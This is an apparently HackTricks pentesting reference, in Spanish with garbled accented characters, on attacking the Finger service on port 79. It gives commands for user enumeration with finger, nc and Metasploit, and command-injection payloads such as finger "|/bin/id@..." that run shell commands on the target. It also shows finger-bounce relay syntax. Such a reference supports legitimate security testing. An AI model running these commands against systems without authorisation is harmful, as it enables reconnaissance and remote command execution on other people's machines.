79 - Pentesting Finger
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Informaci贸n B谩sica
El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. T铆picamente, la informaci贸n proporcionada incluye el nombre de inicio de sesi贸n del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podr铆an abarcar la ubicaci贸n de la oficina y el n煤mero de tel茅fono (si est谩 disponible), la hora en que el usuario inici贸 sesi贸n, el per铆odo de inactividad (tiempo inactivo), la 煤ltima vez que el correo fue le铆do por el usuario, y el contenido de los archivos de plan y proyecto del usuario.
Puerto por defecto: 79
PORT STATE SERVICE
79/tcp open finger
Enumeraci贸n
Captura de Banner/Conexi贸n b谩sica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeraci贸n de usuarios
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap ejecuta un script para hacer usando scripts predeterminados
Metasploit utiliza m谩s trucos que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Ejecuci贸n de comandos
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Usar un sistema como un relay de finger
finger user@host@victim
finger @internal@external
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.